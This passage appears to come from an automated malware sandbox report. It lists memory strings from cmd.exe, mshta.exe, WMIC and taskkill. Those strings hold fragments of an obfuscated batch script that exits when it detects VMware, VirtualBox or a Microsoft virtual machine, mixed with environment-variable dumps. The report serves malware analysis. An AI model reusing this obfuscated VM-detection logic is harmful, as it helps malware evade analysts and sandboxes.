(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OrInvalidPr
Source: cvtres.exe, 00000020.00000002.1489212522.0000021DA009F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc.:
Source: cmd.exe, 0000000B.00000003.1417184239.000002C1DCA59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1450116077.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OEELS
Source: cmd.exe, 0000000B.00000003.1440918733.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O#
Source: mshta.exe, 0000001B.00000002.1488443583.000001C85E524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O\|J
Source: WMIC.exe, 0000001A.00000002.1459712222.000002894DBD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O%
Source: cmd.exe, 0000000B.00000002.1492600587.000002C1DCA1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit mm
Source: cmd.exe, 0000000B.00000003.1407867711.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kwindir=C:\Windowsee
Source: taskkill.exe, 00000058.00000003.1838496153.000001D1F6759000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit
Source: cmd.exe, 0000000B.00000003.1445948201.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: cmd.exe, 0000000B.00000003.1431671269.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lwindir=C:\Windowsx=my=nz=oWW
Source: cmd.exe, 0000000B.00000003.1422648451.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
